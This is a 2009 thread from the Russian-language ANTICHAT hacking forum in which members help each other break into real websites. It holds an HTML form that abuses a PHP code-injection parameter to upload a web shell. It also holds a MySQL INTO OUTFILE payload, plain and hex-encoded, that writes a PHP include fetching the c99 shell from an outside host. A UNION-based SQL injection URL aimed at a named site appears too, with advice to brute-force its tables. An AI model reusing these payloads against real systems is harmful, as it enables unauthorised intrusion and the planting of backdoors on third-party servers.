ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.06.2009, 23:28
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
как можно использовать то, что при подстановке кавычки появляется следующее:
Server Error in '/inclub' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
InClub.Allegati.Page_Load(Object sender, EventArgs e) +95
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Page.ProcessRequestMain() +750
или это:
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
Line 35: private void PopulateDetails()
Line 36: {
Line 37: int intCompanyID = int.Parse(Request.QueryString["CompanyID"]);
Line 38: //int intCompanyID = 20;
Line 39: CompanyHandler objHandler = new CompanyHandler();
Source File: c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs Line: 37
Stack Trace:
[FormatException: Input string was not in a correct format.]
System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal) +7471335
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +119
System.Int32.Parse(String s) +23
CMSWebParts_Viewers_CompanyDetailsReadOnlyView.Pop ulateDetails() in c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs:37
CMSWebParts_Viewers_CompanyDetailsReadOnlyView.Pag e_Load(Object sender, EventArgs e) in c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs:25
System.Web.Util.CalliHelper.EventArgFunctionCaller (IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Cal lback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
CMS.PortalControls.CMSAbstractWebPart.OnLoad(Event Args e) +212
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Control.LoadRecursive() +141
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
Последний раз редактировалось jecka3000; 30.06.2009 в 23:30..
|
|
|
30.06.2009, 23:50
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Input string was not in a correct format.
строка не в том формате,там нет скули.
>>как можно использовать то?
увидешь пару строчек кода:
Код:
Line 35: private void PopulateDetails()
Line 36: {
Line 37: int intCompanyID = int.Parse(Request.QueryString["CompanyID"]);
Line 38: //int intCompanyID = 20;
Line 39: CompanyHandler objHandler = new
и директорию:
Код:
c:\ICMAWebsite\CMSWebParts\Viewers\CompanyDetailsR eadOnlyView.ascx.cs Line: 37
|
|
|
|
30.06.2009, 23:54
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Сообщение от Pashkela
А форму для загрузки не судьба использовать?
Локально такуйю форму:
Код:
<form action=http://site.com/forum/profile.php?mode=editprofile&cmd=copy($_FILES[file][tmp_name],$_GET[aa]);&aa=/var/www/images/tyrytrytr.php
method=post enctype=multipart/form-data>
<input type=file name=file><br>
<input type=submit value=Загрузить><br>
</form>
только предварительно сидеть у себя в браузере зарегенным на форуме в едит профайле и открывать эту форму в том же браузере, ибо куки. С сразу грузить с компа нормальный шелл я чего то не понимаю наверное 
правлю сурс страницы, выбираю, гружу, шелла нет
|
|
|
|
30.06.2009, 23:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
))) какой сурс еще? )) То, что я назвал форма, создай на рабочем столе, обзови 123.html и запусти в том же браузере, где ты УЖЕ сидишь зарегенный на форуме
ЗЫЖ Скопируй код в блокнот, сохрани как 123.txt и переименуй в 123.html, щелкни два раза по файлу мышкой и загружай шелл. Форм экшион сама перенаправит тебя туда, куда нужно
Ах да, вместо site.com вставь реальное название )
Последний раз редактировалось Pashkela; 30.06.2009 в 23:59..
|
|
|
|
30.06.2009, 23:58
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
я только что сейчас так сделал)) не получилось))
|
|
|
|
01.07.2009, 00:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Тогда по обстоятельствам. Всякое бывает. Надо смотреть
ЗЫЖ В личку ничего не слать
А у тебя хоть phpinfo(); хотя бы выводит?
Последний раз редактировалось Pashkela; 01.07.2009 в 00:05..
|
|
|
|
01.07.2009, 00:09
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
да, выводит)
там еще phpmyadmin, но при
PHP код:
select '<? @include("http://madnet.name/files/download/9_c99madshell.php"); ?>' into outfile '/var/www/images/323232323232.php';
он мне
Код:
SQL query: SELECT '<? @include("http://madnet.name/files/download/9_c99madshell.php"); ?>' INTO OUTFILE '/var/www/images/323232323232.php'
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Сообщение от Pashkela
select 0x3c3f2040696e636c7564652822687474703a2f2f6d61646e 65742e6e616d652f66696c65732f646f776e6c6f61642f395f 6339396d61647368656c6c2e70687022293b203f3e into outfile '/var/www/images/323232323232.php';
так же все, ковычки
Последний раз редактировалось +++AndreyDevil+++; 01.07.2009 в 00:29..
|
|
|
|
01.07.2009, 00:11
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
еще раз прошу помощи, а именно в поиске названий таблиц и столбцов в 4-ой версии mysql, вот линк _http://www.deyla.com/p_daelenco.php?id_sito=-1+union+select+1, ???? ,3,4,5,6,7,8,9,10,11+from+ ??? --
|
|
|
|
01.07.2009, 00:19
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
select 0x3c3f2040696e636c7564652822687474703a2f2f6d61646e 65742e6e616d652f66696c65732f646f776e6c6f61642f395f 6339396d61647368656c6c2e70687022293b203f3e into outfile '/var/www/images/323232323232.php';
|
|
|
|
01.07.2009, 00:23
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от jecka3000
еще раз прошу помощи, а именно в поиске названий таблиц и столбцов в 4-ой версии mysql, вот линк _http://www.deyla.com/p_daelenco.php?id_sito=-1+union+select+1, ???? ,3,4,5,6,7,8,9,10,11+from+ ??? --
брут, например c помощью SIPT4
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
